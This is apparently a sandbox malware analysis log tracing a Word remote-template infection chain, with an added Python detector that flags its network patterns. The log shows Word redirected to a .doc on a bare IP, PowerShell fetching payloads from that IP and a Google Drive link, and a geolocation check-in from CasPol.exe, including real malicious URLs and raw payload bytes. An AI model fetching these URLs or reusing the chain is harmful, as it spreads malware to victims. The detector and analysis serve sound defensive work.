Oct 23, 2024 17:26:45.594075918 CEST | 1236 | IN | Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:credss


Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49173 | Destination IP: 85.215.206.82 | Destination Port: 80 | PID: 2924 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:27:15.684478998 CEST | 78 | OUT | GET /270/WRFFDCE.txt HTTP/1.1
Host: 85.215.206.82
Connection: Keep-Alive
Oct 23, 2024 17:27:16.568993092 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:27:16 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 23 Oct 2024 07:23:30 GMT
ETag: "a1000-6251fc3464fdf"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID: 4
Source: 192.168.2.22:49176
Destination: 178.237.33.50:80
PID: 3608
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:27:22.412441969 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 23, 2024 17:27:23.237325907 CEST | 1165 | IN | HTTP/1.1 200 OK
date: Wed, 23 Oct 2024 15:27:23 GMT
server: Apache
content-length: 957
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 33 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
Data Ascii: { "geoplugin_request":"173.254.250.90", "geoplugin_status":200, "geoplugin_delay":"3ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID: 0
Source: 192.168.2.22:49161
Destination: 24.199.88.84:443
PID: 3492
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:26:14 UTC | 130 | OUT | OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: u4u.kids
Content-Length: 0
Connection: Keep-Alive
2024-10-23 15:26:14 UTC | 439 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 23 Oct 2024 15:26:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Allow: GET,HEAD
ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
2024-10-23 15:26:14 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
Data Ascii: GET,HEAD


Session ID: 1
Source: 192.168.2.22:49162
Destination: 24.199.88.84:443
PID: 3492
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:26:15 UTC | 246 | OUT | HEAD /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: u4u.kids
2024-10-23 15:26:15 UTC | 612 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 23 Oct 2024 15:26:15 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 221
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Location: http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
Vary: Accept


Session ID: 2
Source: 192.168.2.22:49163
Destination: 24.199.88.84:443

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:26:19 UTC | 125 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: u4u.kids
2024-10-23 15:26:20 UTC | 439 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 23 Oct 2024 15:26:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Allow: GET,HEAD
ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
2024-10-23 15:26:20 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
Data Ascii: GET,HEAD


Session ID: 3
Source: 192.168.2.22:49164
Destination: 24.199.88.84:443

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:26:21 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
Data Ascii:
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: u4u.kids
2024-10-23 15:26:21 UTC | 435 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 23 Oct 2024 15:26:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'none'
2024-10-23 15:26:21 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


Session ID: 4
Source: 192.168.2.22:49165
Destination: 24.199.88.84:443

Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:26:22 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
Data Ascii:
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: u4u.kids
2024-10-23 15:26:22 UTC | 435 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 23 Oct 2024 15:26:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'none'
2024-10-23 15:26:22 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
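The sessions above show the whole delivery chain at the HTTP layer: WINWORD.EXE probes u4u.kids with the "Microsoft Office Protocol Discovery" and "Microsoft Office Existence Discovery" User-Agents, the HEAD is answered with a 302 to a .doc hosted on a bare IP (the remote template behind the report's "Office viewer loads remote template" signature), the WebDAV MiniRedir then falls back to OPTIONS/PROPFIND against the same host (the "ms-search protocol handler (WebDAV)" signature), and later CasPol.exe, a .NET tool with no reason to geolocate itself, fetches geoplugin.net/json.gp, which together with the report's injection and Remcos detections is the implant's check-in. The Python below is an added example, not part of the Joe Sandbox report: it decodes the report's "Data Raw" hex columns back into HTTP messages and labels each of those patterns. The sample sessions are constructed from the traffic shown above; the GEOIP_HOSTS and BROWSERS lists are assumptions for illustration.

```python
"""Added example (not from the Joe Sandbox report): decode "Data Raw" hex
columns and flag the Office remote-template / WebDAV / geoplugin patterns.
GEOIP_HOSTS and BROWSERS are illustrative assumptions, extend as needed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# User-Agents Office sends while probing a linked/remote resource.
OFFICE_PROBE_UAS = {"Microsoft Office Protocol Discovery",
                    "Microsoft Office Existence Discovery"}
WEBDAV_UA_PREFIX = "Microsoft-WebDAV-MiniRedir/"
GEOIP_HOSTS = {"geoplugin.net", "ip-api.com", "ipinfo.io"}       # assumption
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}  # assumption
OFFICE_DOC_RE = re.compile(r"\.(docx?|dotm?|rtf)(\?|$)", re.I)
BARE_IP_URL_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}/")


@dataclass
class HttpMessage:
    start_line: str
    headers: Dict[str, str]          # header names lower-cased


@dataclass
class Session:
    sid: int
    process: str                     # image path, "" if the report lists none
    request: HttpMessage
    response: Optional[HttpMessage] = None


def decode_data_raw(hex_column: str) -> str:
    """Turn a 'Data Raw: 50 52 4f ...' column back into text, CRLFs intact."""
    return bytes.fromhex(hex_column.replace(" ", "")).decode("latin-1")


def parse_http_message(text: str) -> HttpMessage:
    """Parse the start line and headers of one request or response head."""
    head = text.split("\r\n\r\n", 1)[0]
    lines = [ln for ln in head.split("\r\n") if ln]
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers)


def classify(s: Session) -> List[str]:
    """Return the labels that apply to one session, in a fixed order."""
    findings = []
    ua = s.request.headers.get("user-agent", "")
    method = s.request.start_line.split(" ", 1)[0].upper()
    host = s.request.headers.get("host", "")
    proc = s.process.rsplit("\\", 1)[-1].lower()
    if ua in OFFICE_PROBE_UAS:
        findings.append("office-remote-resource-probe")
    if ua.startswith(WEBDAV_UA_PREFIX) or method == "PROPFIND":
        findings.append("webdav-miniredir")
    loc = s.response.headers.get("location", "") if s.response else ""
    if OFFICE_DOC_RE.search(loc):
        findings.append("redirect-to-office-document")
    if BARE_IP_URL_RE.match(loc):
        findings.append("redirect-to-bare-ip")
    if host in GEOIP_HOSTS and proc not in BROWSERS:
        findings.append("geoip-lookup-from-non-browser")
    return findings


def analyze(sessions: List[Session]) -> Dict[int, List[str]]:
    """Map session id -> findings, keeping only sessions that fire."""
    return {s.sid: f for s in sessions if (f := classify(s))}


# --- constructed sample input, copied from the sessions in this report ---
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
PROPFIND_RAW = ("50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a "
                "55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d "
                "57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e "
                "37 36 30 31 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a")
REDIRECT = ("http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirude"
            "withgreatthigns_________eniterlifewithgreatniceworkingskillwithmeb"
            "greatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc")
SAMPLE_SESSIONS = [
    Session(0, WINWORD, parse_http_message(
        "OPTIONS / HTTP/1.1\r\nUser-Agent: Microsoft Office Protocol Discovery\r\n"
        "Host: u4u.kids\r\n\r\n"),
        parse_http_message("HTTP/1.1 200 OK\r\nAllow: GET,HEAD\r\n\r\n")),
    Session(1, WINWORD, parse_http_message(
        "HEAD /clm3hy?&sing=cuddly&brain=hapless HTTP/1.1\r\n"
        "User-Agent: Microsoft Office Existence Discovery\r\nHost: u4u.kids\r\n\r\n"),
        parse_http_message(f"HTTP/1.1 302 Found\r\nLocation: {REDIRECT}\r\n\r\n")),
    # The report lists no PID/process for the WebDAV sessions; decode the hex dump.
    Session(3, "", parse_http_message(decode_data_raw(PROPFIND_RAW)),
            parse_http_message("HTTP/1.1 404 Not Found\r\nContent-Length: 144\r\n\r\n")),
    Session(10, CASPOL, parse_http_message(
        "GET /json.gp HTTP/1.1\r\nHost: geoplugin.net\r\nCache-Control: no-cache\r\n\r\n"),
        parse_http_message("HTTP/1.1 200 OK\r\ncontent-type: application/json\r\n\r\n")),
]

if __name__ == "__main__":
    for sid, labels in analyze(SAMPLE_SESSIONS).items():
        print(f"session {sid}: {', '.join(labels)}")
```

The probe User-Agents and the MiniRedir OPTIONS/PROPFIND pair are benign on their own (any document with a linked resource on a WebDAV share produces them), so the useful signal is the combination: a probe answered by a 302 to an Office document on a bare IP, followed by the same host being mounted over WebDAV, followed by a process that is not a browser asking a geolocation service where it is.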


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.22  49166        24.199.88.84    443               3492  C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp                Bytes transferred  Direction  Data
2024-10-23 15:26:23 UTC  476                OUT        GET /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: u4u.kids
    Connection: Keep-Alive
2024-10-23 15:26:23 UTC  600                IN         HTTP/1.1 302 Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 23 Oct 2024 15:26:23 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 221
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Location: http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
    Vary: Accept
2024-10-23 15:26:23 UTC  221                IN         (response body, 221 bytes)
    Data Ascii: Found. Redirecting to http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.22  49168        24.199.88.84    443               3492  C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp                Bytes transferred  Direction  Data
2024-10-23 15:26:26 UTC  265                OUT        HEAD /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
    User-Agent: Microsoft Office Existence Discovery
    Host: u4u.kids
    Content-Length: 0
    Connection: Keep-Alive
2024-10-23 15:26:26 UTC  612                IN         HTTP/1.1 302 Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 23 Oct 2024 15:26:26 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 221
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Location: http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc
    Vary: Accept


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
7           192.168.2.22  49171        142.250.181.238  443               2924  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-23 15:26:53 UTC  121                OUT        GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
    Host: drive.google.com
    Connection: Keep-Alive
2024-10-23 15:26:53 UTC  1319               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 23 Oct 2024 15:26:53 GMT
    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-8M7StpCf8ybRVaq4xkDX2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.22  49172        216.58.212.129  443               2924  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-23 15:26:54 UTC  139                OUT        GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-10-23 15:26:56 UTC  4884               IN         HTTP/1.1 200 OK
    Content-Type: image/jpeg
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="new_image-new.jpg"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 2239109
    Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
    X-GUploader-UploadID: AHmUCY2OWyLVono0YjYRAisQt6d5YHZGp5voL6qrZPhWTCALmnJPPiAQ3ytXo1Y2WEePyL4a2PdM1QNkDA
    Date: Wed, 23 Oct 2024 15:26:56 GMT
    Expires: Wed, 23 Oct 2024 15:26:56 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=WqxmdA==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48
                                                                                                                                                                        Data Ascii: v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiH
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22
                                                                                                                                                                        Data Ascii: 0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7"@'m"
